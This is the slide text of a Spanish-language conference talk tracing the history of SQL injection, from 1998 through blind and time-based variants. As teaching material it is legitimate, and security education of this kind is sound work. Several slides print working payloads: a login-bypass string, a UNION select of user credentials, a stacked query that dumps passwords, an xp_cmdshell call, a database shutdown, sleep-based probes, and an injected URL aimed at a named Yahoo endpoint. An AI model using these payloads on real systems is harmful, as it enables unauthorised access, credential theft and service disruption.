Charla de Chema Alonso sobre la historia y evolución de las técnicas de SQL Injection en el evento Codemotion ES del año 2013 que tuvo lugar en la Escuela Universitaria de Informática de la Universidad Politécnica de Madrid

1. Feliz 15 aniversario, SQL Injection

2. Los Amantes del Círculo Polar

3. 25 – Dec – 1998: El nacimiento
http://www.phrack.org/issues.html?id=8&issue=54

4. „or „1‟=„1
admin
„ or „1‟=„1
q=“Select uid from users where uid=„“+$user+”‟ and pass=“‟+pass+‟”;”
q=“Select uid from users where uid=„admin‟ and pass=„‟ or „1‟=„1‟;”

6. 14 – Aug – 2007: IBM
http://www.docstoc.com/docs/39896830/IBM-Rational-ClearQuest-Web-Login-Bypass-SQL-Injection-Vulnerability

7. Inband
-1‘ union select 1,1,1,1,username,1,’a’,1 from users --

9. 2001 - OutBand
http://www.blackhat.com/presentations/bh-asia-01/litchfield/litchfield.doc

10. Yesterday - [Microsoft][ODBC SQL Server Driver]
[SQL Server]Incorrect syntax near the keyword 'or'.
q=“Select title from noticias where ud=“+$id+”;”
Id=1 or 1=(select top 1 username from sysusers)

11. Jul – 2007: Microsoft Partner Programme

12. 2002 – Advanced SQL Injection Techniques
https://sparrow.ece.cmu.edu/group/731-s11/readings/anley-sql-inj.pdf

13. Advanced Tricks
Username: '; begin declare @ret varchar(8000) set @ret=':' select
@ret=@ret+' '+username+'/'+password from users where username>@ret
select @ret as ret into foo end--
Username: ' union select ret,1,1,1 from foo--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07‟
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the varchar value ': admin/r00tr0x! guest/guest chris/password
fred/sesame' to a column of data type int.
exec master..xp_cmdshell 'dir'
Id= 1; shutdown --

14. 27 – Mar - 2007

15. Outter Bands
DNS Queries
FTP Sites
SMB Files
Remote DB
Web Files
Log Files

16. 2002 - Blind
http://server/miphp.php?id=1 and 1=1
True
http://server/miphp.php?id=1 and 1=0
False

17. 2010 – US Army

18. 2010 – US Army

19. 2002 – Time Based Blind SQL Injection
http://www.northernfortress.net/more_advanced_sql_injection.pdf

20. (more) Advanced Tricks
ping -n 10 127.0.0.1
if (ascii(substring(@s, @byte, 1)) & ( power(2, @bit))) > 0 waitfor delay '0:0:5'

22. 2004 – Time-Based in Other Databases
SQL Server
1) ; if … wait for delay
2) ; exec xp_cmdshell (ping –n)
Oracle
1) dms_lock.sleep()
PL/SLQ Injection
MySQL
1) and sleep()
5.0 or higher
2) Benchmarck functions
Postgres:
1) pg:sleep()

23. Jun – 2007 : Solar Empire Exploit
http://www.elladodelmal.com/2007/06/blind-sql-injection-ii-de-hackeando-un.html

24. Apr – 2013: Yahoo!
http://tw.ysm.emarketing.yahoo.com/soeasy/index.php?p=
2&scId=113; select SLEEP(5)--
http://www.elladodelmal.com/2013/04/time-based-blind-sql-injection-en-yahoo.html

25. 2007 – Time-Based SQL Injection using Heavy Queries
https://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdf

26. Time-Based Using Heavy Queries in MS Access
True
False

27. Deep Blind SQL Injection
http://labs.portcullis.co.uk/application/deep-blind-sql-injection

28. Serialized SQL Injection

29. Airthmetic Blind SQL Injection

30. RFD

31. Connection String Parameter Pollution

32. Xpath Injection

33. LDAP Injection

34. OWASP TOP 10 - 2013

35. Forbiden

36. Fixing Code Injections isn t the worst job